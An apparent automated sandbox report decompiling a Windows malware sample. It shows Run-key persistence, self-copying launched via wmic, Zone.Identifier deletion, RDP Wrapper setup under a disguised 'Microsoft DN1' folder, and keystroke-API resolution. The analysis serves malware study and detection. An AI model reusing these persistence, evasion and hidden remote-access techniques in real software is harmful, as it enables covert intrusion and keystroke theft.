								E02D15EA5(_v24);
								E02D15EA5(_v32);
								_t241 =  *((intOrPtr*)(_t169 + 0xc));
								E02D1F76B( &_v24,  *((intOrPtr*)(_t169 + 0xc)), _t262); // executed
								 *_t256 = L":ApplicationData"; // executed
								E02D1346A( &_v24,  *((intOrPtr*)(_t169 + 0xc)), _t262, 0x2d24550); // executed
								E02D135E5( &_a12, L"wmic process call create \'\""); // executed
								_t254 = _v24;
								_t131 = E02D1346A( &_a12, _t241, _t262, _t254); // executed
								E02D1346A(_t131, _t241, _t262, L"\"\'"); // executed
								E02D1346A( &_v16, _t241, _t262, L":start"); // executed
								_t135 = E02D13554( &_a12,  &_v24); // executed
								_t137 = E02D13554( &_v16,  &_v32); // executed
								_t138 = E02D13261( &_a12);
								_t239 =  *_t135;
								E02D21D35( *_t137,  *_t135, _t138); // executed
								E02D15EA5(_v32);
								E02D15EA5(_v24);
								_t243 = 0;
								_t142 = CopyFileW(_v20, _t254, 0); // executed
								_t217 = _a12;
								if(_t142 != 0) {
									E02D15EA5(_t217);
									_a12 = 0;
									E02D15EA5(_t254);
									E02D15EA5(_v12);
									_v12 = 0;
									E02D15EA5(_v16);
									_t169 = _v40;
									goto L11;
								} else {
									E02D15EA5(_t217);
									_a12 = 0;
									E02D15EA5(_t254);
									E02D15EA5(_v12);
									_t180 = _v16;
									_v12 = 0;
									L18:
									E02D15EA5(_t180);
								}
							}
						}
					}
				}
				E02D15EA5(_v48);
				E02D15EA5(_v20);
				return _t243;
			}





































                                                                    0x02d21136
                                                                    0x02d2113d
                                                                    0x02d21144
                                                                    0x02d21147
                                                                    0x02d2114e
                                                                    0x02d2114f
                                                                    0x02d21152
                                                                    0x02d21157
                                                                    0x02d21158
                                                                    0x02d21160
                                                                    0x02d21169
                                                                    0x02d2116e
                                                                    0x02d21172
                                                                    0x02d21236
                                                                    0x02d21236
                                                                    0x00000000
                                                                    0x02d21178
                                                                    0x02d21178
                                                                    0x02d2117b
                                                                    0x00000000
                                                                    0x02d21181
                                                                    0x02d21181
                                                                    0x02d21187
                                                                    0x02d2118a
                                                                    0x02d21192
                                                                    0x02d211a1
                                                                    0x02d211ad
                                                                    0x02d211b9
                                                                    0x02d211c4
                                                                    0x02d211c9
                                                                    0x02d211cc
                                                                    0x02d211d7
                                                                    0x02d211df
                                                                    0x02d211e8
                                                                    0x02d211ea
                                                                    0x02d211f5
                                                                    0x02d211fd
                                                                    0x02d21202
                                                                    0x02d21205
                                                                    0x02d21216
                                                                    0x02d21227
                                                                    0x02d2122f
                                                                    0x02d21239
                                                                    0x02d2123b
                                                                    0x02d2124b
                                                                    0x02d2124b
                                                                    0x02d21250
                                                                    0x02d21253
                                                                    0x02d213d6
                                                                    0x02d213d6
                                                                    0x02d213da
                                                                    0x02d21450
                                                                    0x02d21456
                                                                    0x02d2146c
                                                                    0x02d21474
                                                                    0x02d2147c
                                                                    0x02d21482
                                                                    0x02d21487
                                                                    0x02d21487
                                                                    0x00000000
                                                                    0x02d213dc
                                                                    0x02d213dc
                                                                    0x02d213e0
                                                                    0x02d213e9
                                                                    0x02d213e9
                                                                    0x02d213fe
                                                                    0x02d21403
                                                                    0x02d21405
                                                                    0x02d21412
                                                                    0x02d2142d
                                                                    0x02d21437
                                                                    0x02d2143f
                                                                    0x02d21444
                                                                    0x02d21446
                                                                    0x02d2144b
                                                                    0x00000000
                                                                    0x02d2144b
                                                                    0x02d21446
                                                                    0x02d21405
                                                                    0x02d21259
                                                                    0x02d21264
                                                                    0x02d21270
                                                                    0x02d2127d
                                                                    0x02d2128a
                                                                    0x02d2129f
                                                                    0x02d212a6
                                                                    0x02d212ad
                                                                    0x02d212b9
                                                                    0x02d212c7
                                                                    0x02d212db
                                                                    0x02d212e3
                                                                    0x02d212eb
                                                                    0x02d212f0
                                                                    0x02d212f6
                                                                    0x02d212fe
                                                                    0x02d21305
                                                                    0x02d21312
                                                                    0x02d21317
                                                                    0x02d21323
                                                                    0x02d2132a
                                                                    0x02d21337
                                                                    0x02d21343
                                                                    0x02d21351
                                                                    0x02d2135b
                                                                    0x02d21361
                                                                    0x02d21365
                                                                    0x02d2136e
                                                                    0x02d21376
                                                                    0x02d2137b
                                                                    0x02d21382
                                                                    0x02d21388
                                                                    0x02d2138d
                                                                    0x02d213b1
                                                                    0x02d213b8
                                                                    0x02d213bb
                                                                    0x02d213c3
                                                                    0x02d213cb
                                                                    0x02d213ce
                                                                    0x02d213d3
                                                                    0x00000000
                                                                    0x02d2138f
                                                                    0x02d2138f
                                                                    0x02d21396
                                                                    0x02d21399
                                                                    0x02d213a1
                                                                    0x02d213a6
                                                                    0x02d213a9
                                                                    0x02d21488
                                                                    0x02d21488
                                                                    0x02d21488
                                                                    0x02d2138d
                                                                    0x02d21253
                                                                    0x02d211df
                                                                    0x02d2117b
                                                                    0x02d21490
                                                                    0x02d21498
                                                                    0x02d214a3

                                                                    APIs
                                                                      • Part of subcall function 02D1F481: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,02D235AB,?,02D21618,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 02D1F4A2
                                                                      • Part of subcall function 02D20F6E: RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,745D0770,?,?,02D21165,?,?), ref: 02D20F8E
                                                                      • Part of subcall function 02D20FAE: RegCloseKey.KERNEL32(?,?,02D2112D,?,?,02D236DB), ref: 02D20FB8
                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,02D24684,?,00000000,?,?,?,?,00000000,745D0770,00000000), ref: 02D211D7
                                                                      • Part of subcall function 02D2106C: RegCreateKeyExW.ADVAPI32(745D0770,00000000,00000000,00000000,00000000,02D235AB,00000000,?,?,?,?,02D235AB,?,02D2158B,80000001,?), ref: 02D210A0
                                                                      • Part of subcall function 02D2106C: RegOpenKeyExW.KERNEL32(745D0770,00000000,00000000,02D235AB,?,?,?,02D235AB,?,02D2158B,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 02D210BB
                                                                      • Part of subcall function 02D21039: RegSetValueExW.KERNEL32(?,745D0770,00000000,?,?,?,?,?,02D21432,00000000,00000000,?,00000001,?,?,?), ref: 02D21058
                                                                    • SHGetKnownFolderPath.SHELL32(02D24550,00000000,00000000,?,?,?,?,?,00000000,745D0770,00000000), ref: 02D21264
                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,:start,?,02D27204,wmic process call create '",00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in ("), ref: 02D21382
                                                                      • Part of subcall function 02D1F76B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,00000000,?), ref: 02D1F79C
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D1F71F: SHCreateDirectoryExW.SHELL32(00000000,?,00000000,02D211A6,00000000,?,?,?,?,00000000,745D0770,00000000), ref: 02D1F725
                                                                      • Part of subcall function 02D1362D: lstrcpyW.KERNEL32 ref: 02D13657
                                                                      • Part of subcall function 02D13335: lstrcatW.KERNEL32(00000000,745D0770), ref: 02D13365
                                                                    • DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,00000000,745D0770,00000000), ref: 02D2147C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Create$CopyFolderPathlstrcpy$CloseDeleteDirectoryFreeKnownModuleNameOpenSpecialValueVirtuallstrcat
                                                                    • String ID: ") do %%A$:Zone.Identifier$:start$\programs.bat$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"
                                                                    • API String ID: 2154703971-2016382161
                                                                    • Opcode ID: df519d2a3d250460643bb2c9918077df67c153c4718c069d695799f6234b58c8
                                                                    • Instruction ID: 57ae90a99e7cd1d42dd5f9ba39346c258d312403fb3680b311cf6719443218ba
                                                                    • Opcode Fuzzy Hash: df519d2a3d250460643bb2c9918077df67c153c4718c069d695799f6234b58c8
                                                                    • Instruction Fuzzy Hash: 91A13EB1A00119ABEF15EF60E8919EE777AEFA4704F508059E81667790DF34AE09CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1E703 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 121COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 79%
                                                                    			E02D1E703(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr* _t11;
				void* _t14;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t25;
				void* _t33;
				void* _t42;
				intOrPtr _t43;
				void* _t67;
				intOrPtr _t71;
				void* _t80;

				_t67 = __edx;
				_push(__ecx);
				_push(__ecx);
				InitializeCriticalSection(0x2e5e020);
				_t71 = 5;
				asm("xorps xmm0, xmm0");
				 *0x2e5e070 = _t71;
				 *0x2e5e068 = _t71;
				_t42 = 0x18;
				asm("movups [0x2e5e038], xmm0");
				 *0x2e5e048 = 0;
				asm("movups [0x2e5e050], xmm0");
				 *0x2e5e060 = 0;
				 *0x2e5e06c = 0;
				_t11 = E02D15F53(_t42);
				_t82 = _t11;
				if(_t11 == 0) {
					_t43 = 0;
				} else {
					 *_t11 = _t71;
					_t1 = _t11 + 4; // 0x4
					_t43 = _t1;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
				}
				 *0x2e5e064 = _t43;
				 *0x2e5e07c = 0;
				 *0x2e5e080 = 0; // executed
				E02D132FF(0x2e5e048, _t67, L"TermService"); // executed
				E02D132FF(0x2e5e054, _t67, L"%ProgramFiles%"); // executed
				_t14 = E02D135E5( &_v12, L"%windir%\\System32"); // executed
				_t68 = _t14;
				_t15 = E02D131D4( &_v8, _t14, _t82); // executed
				E02D13437(0x2e5e060, _t15); // executed
				E02D15EA5(_v8);
				_v8 = 0;
				E02D15EA5(_v12);
				_t19 = E02D1FC58(_v12);
				_t83 = _t19 - 1;
				if(_t19 != 1) {
					_t69 = 0x2e5e054;
					_t20 = E02D131D4( &_v12, 0x2e5e054, __eflags);
					_t80 = 0x2e5e058;
					E02D13437(0x2e5e058, _t20);
					E02D15EA5(_v12);
				} else {
					E02D132FF(0x2e5e054, _t68, L"%ProgramW6432%"); // executed
					_t69 = 0x2e5e054;
					_t33 = E02D131D4( &_v12, 0x2e5e054, _t83); // executed
					_t80 = 0x2e5e058;
					E02D13437(0x2e5e058, _t33); // executed
					E02D15EA5(_v12);
					E02D132FF(0x2e5e054, 0x2e5e054, L"%ProgramFiles%"); // executed
				}
				E02D1346A(_t80, _t69, _t83, L"\\Microsoft DN1"); // executed
				E02D1346A(0x2e5e054, _t69, _t83, L"\\Microsoft DN1"); // executed
				_t25 = E02D1346A(0x2e5e060, _t69, _t83, L"\\rfxvmt.dll"); // executed
				E02D1F71F(_t25, _t80);
				E02D13437(0x2e5e05c, _t80); // executed
				E02D1346A(0x2e5e05c, _t69, _t83, L"\\rdpwrap.ini"); // executed
				E02D1346A(_t80, _t69, _t83, L"\\sqlmap.dll"); // executed
				E02D1346A(0x2e5e054, _t69, _t83, L"\\sqlmap.dll"); // executed
				return 0x2e5e020;
			}

















                                                                    0x02d1e703
                                                                    0x02d1e706
                                                                    0x02d1e707
                                                                    0x02d1e710
                                                                    0x02d1e718
                                                                    0x02d1e719
                                                                    0x02d1e71c
                                                                    0x02d1e724
                                                                    0x02d1e72c
                                                                    0x02d1e72d
                                                                    0x02d1e734
                                                                    0x02d1e73a
                                                                    0x02d1e741
                                                                    0x02d1e747
                                                                    0x02d1e74d
                                                                    0x02d1e752
                                                                    0x02d1e754
                                                                    0x02d1e766
                                                                    0x02d1e756
                                                                    0x02d1e756
                                                                    0x02d1e758
                                                                    0x02d1e758
                                                                    0x02d1e75f
                                                                    0x02d1e760
                                                                    0x02d1e761
                                                                    0x02d1e762
                                                                    0x02d1e763
                                                                    0x02d1e763
                                                                    0x02d1e768
                                                                    0x02d1e778
                                                                    0x02d1e77e
                                                                    0x02d1e784
                                                                    0x02d1e796
                                                                    0x02d1e7a3
                                                                    0x02d1e7a8
                                                                    0x02d1e7ad
                                                                    0x02d1e7b8
                                                                    0x02d1e7c0
                                                                    0x02d1e7c8
                                                                    0x02d1e7cb
                                                                    0x02d1e7d0
                                                                    0x02d1e7d5
                                                                    0x02d1e7d8
                                                                    0x02d1e80f
                                                                    0x02d1e814
                                                                    0x02d1e819
                                                                    0x02d1e821
                                                                    0x02d1e829
                                                                    0x02d1e7da
                                                                    0x02d1e7e1
                                                                    0x02d1e7e6
                                                                    0x02d1e7eb
                                                                    0x02d1e7f0
                                                                    0x02d1e7f8
                                                                    0x02d1e800
                                                                    0x02d1e808
                                                                    0x02d1e808
                                                                    0x02d1e836
                                                                    0x02d1e83e
                                                                    0x02d1e84d
                                                                    0x02d1e854
                                                                    0x02d1e861
                                                                    0x02d1e86d
                                                                    0x02d1e87a
                                                                    0x02d1e882
                                                                    0x02d1e890

                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(02E5E020), ref: 02D1E710
                                                                      • Part of subcall function 02D15F53: GetProcessHeap.KERNEL32(00000000,000000F4,02D20477,?,745D0770,00000000,02D15A34), ref: 02D15F56
                                                                      • Part of subcall function 02D15F53: HeapAlloc.KERNEL32(00000000), ref: 02D15F5D
                                                                      • Part of subcall function 02D131D4: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 02D13207
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                                                    • String ID: %ProgramFiles%$%ProgramW6432%$%windir%\System32$TermService$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll
                                                                    • API String ID: 2811233055-3289620323
                                                                    • Opcode ID: c9d0c52ceeb2ece4af80d2a752e57d3045f533b3a738838535b569a1aa2775ae
                                                                    • Instruction ID: 747ecfe378fcdbe344bc1308490f314615e76d4ea468bb4a39ec222de6635490
                                                                    • Opcode Fuzzy Hash: c9d0c52ceeb2ece4af80d2a752e57d3045f533b3a738838535b569a1aa2775ae
                                                                    • Instruction Fuzzy Hash: 3331A3B0F903A4B7AB59BF65B85196E776BDFE4700F44449AA80257B80CF704E49CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D199A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 38libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 80%
                                                                    			E02D199A8() {
				intOrPtr _t1;
				intOrPtr _t5;

				_t1 = 5;
				 *0x2e5db0c = _t1;
				 *0x2e5d0f4 = 0;
				 *0x2e5db04 = _t1;
				 *0x2e5db08 = 0;
				E02D11875(0x2e5db00, 0);
				InitializeCriticalSection(0x2e5db10);
				E02D1FECE(0x2e5db3c, 0);
				asm("xorps xmm0, xmm0");
				 *0x2e5db28 = 0;
				asm("movups [0x2e5db54], xmm0");
				 *0x2e5db38 = 0;
				_t19 = LoadLibraryW(L"User32.dll");
				_push(0x2e5db3c);
				_t5 = E02D20969(_t4, "GetRawInputData", 0); // executed
				 *0x2e5db2c = _t5;
				 *0x2e5db34 = E02D20969(_t19, "ToUnicode", 0);
				 *0x2e5db30 = E02D20969(_t19, "MapVirtualKeyA", 0);
				return 0x2e5d0e8;
			}





                                                                    0x02d199ab
                                                                    0x02d199ae
                                                                    0x02d199b8
                                                                    0x02d199be
                                                                    0x02d199c3
                                                                    0x02d199c9
                                                                    0x02d199d3
                                                                    0x02d199de
                                                                    0x02d199e3
                                                                    0x02d199e6
                                                                    0x02d199f1
                                                                    0x02d199f8
                                                                    0x02d19a04
                                                                    0x02d19a0b
                                                                    0x02d19a0e
                                                                    0x02d19a18
                                                                    0x02d19a29
                                                                    0x02d19a36
                                                                    0x02d19a41

                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(02E5DB10,?,02D11221), ref: 02D199D3
                                                                    • LoadLibraryW.KERNEL32(User32.dll,?,02D11221), ref: 02D199FE
                                                                      • Part of subcall function 02D20969: lstrcmpA.KERNEL32(?,02D21BD0,?,open,02D21BD0), ref: 02D209A2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                                                    • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                                                    • API String ID: 4274177235-2474467583
                                                                    • Opcode ID: d3c57bee4aa800dee3a3dc0a9cea26b1c3563806fd4788cf103fce285bfa1f35
                                                                    • Instruction ID: 56d5db8e9b76557e7074e474b8534051ad41d860b21f7f814831edac5f1d6a7e
                                                                    • Opcode Fuzzy Hash: d3c57bee4aa800dee3a3dc0a9cea26b1c3563806fd4788cf103fce285bfa1f35
                                                                    • Instruction Fuzzy Hash: 63014F71EF0B309F9298AF667C3010A3B97D7A8604B51890AE805E7340EA300CD5DB5A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004053A0 Relevance: 9.1, APIs: 6, Instructions: 104windowmemorysleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 329 4053a0-405452 VirtualAlloc VirtualProtect 330 405458-40545e 329->330 331 405460 330->331 332 405463-40546d 330->332 331->332 332->330 333 40546f 332->333 334 405474-405479 333->334 335 405480-405493 MessageBoxA 334->335 335->335 336 405495-405498 335->336 336->334 337 40549a-40549d 336->337 338 4054a0-4054d9 MessageBoxA * 2 337->338 338->338 339 4054db-4054fa 338->339 341 405500-405507 Sleep 339->341 341->341
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,00A00000,00003000,00000040), ref: 0040540A
                                                                    • VirtualProtect.KERNEL32(74707E90,00000100,00000040,?), ref: 0040542E
                                                                    • MessageBoxA.USER32(00000000,00418940,00418940,00000001), ref: 0040548E
                                                                    • MessageBoxA.USER32(00000000,00418940,00418940,00000001), ref: 004054AE
                                                                    • MessageBoxA.USER32(00000000,00418940,00418940,00000002), ref: 004054D0
                                                                    • Sleep.KERNEL32(00000320), ref: 00405505
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Virtual$AllocProtectSleep
                                                                    • String ID:
                                                                    • API String ID: 521561353-0
                                                                    • Opcode ID: 95ca5d20b4e5af5916642e185278758472d78cd8c41d50ca6c9c88b91116f6ec
                                                                    • Instruction ID: 786cb841dad3063349046433c84f3772dcb4d30a159cb99551377f828772fc83
                                                                    • Opcode Fuzzy Hash: 95ca5d20b4e5af5916642e185278758472d78cd8c41d50ca6c9c88b91116f6ec
                                                                    • Instruction Fuzzy Hash: 0241F834E447C49AD7024FB98D017F9FF70AF2A700F149269E9883B2A2DA7455C5CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D15CE2 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 402 2d15ce2-2d15cf5 GetCommandLineA 403 2d15cf7-2d15cfc 402->403 404 2d15d1f-2d15d21 402->404 405 2d15d0f-2d15d1a 403->405 406 2d15cfe 403->406 407 2d15d23 404->407 408 2d15d1c-2d15d1d 404->408 410 2d15d2a 405->410 409 2d15d00-2d15d04 406->409 411 2d15d2c-2d15d2e 407->411 408->404 409->405 412 2d15d06-2d15d0d 409->412 410->411 413 2d15d30-2d15d69 GetStartupInfoA call 2d15d70 call 2d15d9d GetModuleHandleA call 2d23457 call 2d15d85 ExitProcess 411->413 414 2d15d25-2d15d27 411->414 412->405 412->409 414->413 415 2d15d29 414->415 415->410
                                                                    C-Code - Quality: 100%
                                                                    			E02D15CE2() {
				struct _STARTUPINFOA _v72;
				intOrPtr _t6;
				int _t11;
				intOrPtr _t15;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr _t20;

				_t16 = GetCommandLineA();
				_t6 =  *_t16;
				if(_t6 != 0x22) {
					while(1) {
						__eflags = _t6 - 0x20;
						if(_t6 <= 0x20) {
							break;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						_t6 =  *_t16;
					}
					L12:
					if(_t6 != 0) {
						__eflags = _t6 - 0x20;
						if(_t6 > 0x20) {
							goto L13;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						L11:
						_t6 =  *_t16;
						goto L12;
					}
					L13:
					_t2 =  &(_v72.dwFlags);
					_v72.dwFlags = _v72.dwFlags & 0x00000000;
					GetStartupInfoA( &_v72);
					E02D15D70();
					E02D15D9D(0x2d29000, 0x2d2902c);
					GetModuleHandleA(0);
					_t11 = E02D23457( *_t2, 0x2d29000, 0x2d29000); // executed
					E02D15D85();
					ExitProcess(_t11);
				}
				_t18 = _t16 + 1;
				_t20 =  *_t18;
				if(_t20 == 0) {
					L5:
					_t1 = _t18 + 1; // 0x3
					_t14 =  !=  ? _t18 : _t1;
					_t16 =  !=  ? _t18 : _t1;
					goto L11;
				}
				_t15 = _t20;
				while(1) {
					_t20 = _t15;
					if(_t15 == 0x22) {
						goto L5;
					}
					_t18 = _t18 + 1;
					_t20 =  *_t18;
					_t15 = _t20;
					if(_t20 != 0) {
						continue;
					}
					goto L5;
				}
				goto L5;
			}










                                                                    0x02d15cef
                                                                    0x02d15cf1
                                                                    0x02d15cf5
                                                                    0x02d15d1f
                                                                    0x02d15d1f
                                                                    0x02d15d21
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d15d1c
                                                                    0x02d15d1c
                                                                    0x02d15d1d
                                                                    0x02d15d1d
                                                                    0x02d15d2c
                                                                    0x02d15d2e
                                                                    0x02d15d25
                                                                    0x02d15d27
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d15d29
                                                                    0x02d15d29
                                                                    0x02d15d2a
                                                                    0x02d15d2a
                                                                    0x00000000
                                                                    0x02d15d2a
                                                                    0x02d15d30
                                                                    0x02d15d30
                                                                    0x02d15d30
                                                                    0x02d15d38
                                                                    0x02d15d3e
                                                                    0x02d15d4d
                                                                    0x02d15d54
                                                                    0x02d15d5c
                                                                    0x02d15d63
                                                                    0x02d15d69
                                                                    0x02d15d69
                                                                    0x02d15cf7
                                                                    0x02d15cf8
                                                                    0x02d15cfc
                                                                    0x02d15d0f
                                                                    0x02d15d0f
                                                                    0x02d15d15
                                                                    0x02d15d18
                                                                    0x00000000
                                                                    0x02d15d18
                                                                    0x02d15cfe
                                                                    0x02d15d00
                                                                    0x02d15d00
                                                                    0x02d15d04
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d15d06
                                                                    0x02d15d07
                                                                    0x02d15d09
                                                                    0x02d15d0d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d15d0d
                                                                    0x00000000

                                                                    APIs
                                                                    • GetCommandLineA.KERNEL32 ref: 02D15CE9
                                                                    • GetStartupInfoA.KERNEL32(?), ref: 02D15D38
                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 02D15D54
                                                                    • ExitProcess.KERNEL32 ref: 02D15D69
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                    • String ID:
                                                                    • API String ID: 2164999147-0
                                                                    • Opcode ID: 082f514d9492019f66f40e96f8b195e2f4d0b1e86f7704a945cbb97bce12342a
                                                                    • Instruction ID: 746ab497c6ed6e681665e1e54ac8854017c1c3ea5e27065c27a9f2c8b469ae92
                                                                    • Opcode Fuzzy Hash: 082f514d9492019f66f40e96f8b195e2f4d0b1e86f7704a945cbb97bce12342a
                                                                    • Instruction Fuzzy Hash: FB01D2285442483EDB352AB4B48D7EA3BA69FA6208FE42088D49287702D71A4C0BCB65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D21E21 Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 424 2d21e21-2d21e59 call 2d11085 CreateFileA 427 2d21e5b 424->427 428 2d21e5e-2d21e7a GetFileSize ReadFile 424->428 427->428 429 2d21e7e-2d21e8b FindCloseChangeNotification 428->429 430 2d21e7c 428->430 430->429
                                                                    C-Code - Quality: 91%
                                                                    			E02D21E21(CHAR* __ecx, signed int* __edx) {
				long _v8;
				void* _t5;
				long _t6;
				signed int _t7;
				void* _t11;
				signed int* _t18;
				void* _t22;

				_push(__ecx);
				_t18 = __edx;
				_t11 = E02D11085(0x400000);
				_v8 = 0;
				_t5 = CreateFileA(__ecx, 0x80000000, 0, 0, 3, 0x80, 0); // executed
				_t22 = _t5;
				if(_t22 == 0xffffffff) {
					 *_t18 =  *_t18 & 0x00000000;
				}
				_t6 = GetFileSize(_t22, 0);
